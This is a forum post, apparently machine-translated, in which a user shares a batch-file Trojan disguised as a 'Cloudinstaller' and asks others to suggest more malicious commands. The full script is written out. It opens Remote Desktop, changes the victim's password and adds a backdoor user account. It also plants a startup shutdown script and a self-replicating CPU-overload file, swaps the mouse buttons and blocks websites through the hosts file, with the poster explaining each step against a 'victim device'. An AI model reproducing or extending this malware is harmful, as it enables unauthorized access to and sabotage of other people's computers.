Does anyone have an improvement for this trojan?

ja
1

I have programmed a "small" batch Trojan.

I can't think of any more orders. Does anyone have an idea what I could add?

By the way, the Trojan is called "Roemer" (inspired by "Trojan") and is "disguised" as a cloud installer.
(The Trojan is still being converted to .exe)

About the code: I often have "cd." done because the "starter" (from the Trojan) may have put the Trojan in a folder, which has packed in a folder, etc.)

@echo off

title Cloudinstaller V.0.6

set newline = ^ & echo.

cls

echo Run as admin! / Open as an admin!

pause> NUL

cls

echo Username / Username (Example: Timon)

set / P "HUH =>"

cls

netsh advfirewall firewall set rule group = "Remote Desktop" new enable = yes

reg add "HKLM \ System \ CurrentControlSet \ Control \ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / f

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

cd C: \ Users \% HUH% \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup

echo shutdown -s -t 60> Friendly.bat

net user% HUH% heiligeroemer

net user Roemer roman empire / add

echo start hoesmad.bat> hoesmad.bat

Rundll32 user32, SwapMouseButton

cd C: \ Users \% HUH% \ Desktop

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

CD.

cd windows

cd System32

cd drivers

cd etc

echo 127.0.0.1 http://www.netflix.com/...etflix.com >> hosts

echo 127.0.0.1 http://www.youtube.com/...outube.com >> hosts

echo 127.0.0.1 http://www.instagram.com/...tagram.com >> hosts

echo 127.0.0.1 http://www.twitter.com >> hosts

cls

echo process completed.

pause> NUL

Explanations: So netsh advfirewall firewall set rule group = "Remote Desktop" new enable = yes

and

reg add "HKLM \ System \ CurrentControlSet \ Control \ Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / f

are there to activate or allow the "remote host connection".

later I added a user so that I can get access to the user and then get access to the "main user".

If you know the person you "infected" personally, I have had the password changed.

Mousebuttons are changed

There's an "infinite CPU overload"

Websites are blocked (btw, if someone knows the command to block programs or a command that closes when the program is opened, write me)

The "victim device" is shut down after 60 seconds.

Maybe I'll add the taskkill / F / Fi "status eq running" command, but the last one.

I thank you for the help.

Le

Scriptkiddie.

What hairstyle / style of clothing does Ratched have in the series Ratched 1947? An Answer4
  • 3 answers
Pixelated Netflix quality? Blame TV or Netflix? Er Erick1792
  • 1 answer
Walking Dead (air date)? Si Silas44
  • 6 answers
Fortnite FPS Drops. New CPU or GPU? De Deeplyelian
  • 33 answers
Does anyone have the Dark Passenger speech from the series / book Dexter? Ca Cayden402
  • 1 answer
No signal on the TV (cable)? ha harmonyNeil
  • 7 answers
Where can you get a Netflix Hoodie?

Where can you get a Netflix Hoodie?
Iphone 11 vs 12 mini?

Iphone 11 vs 12 mini?
Poster search for school project?

Poster search for school project?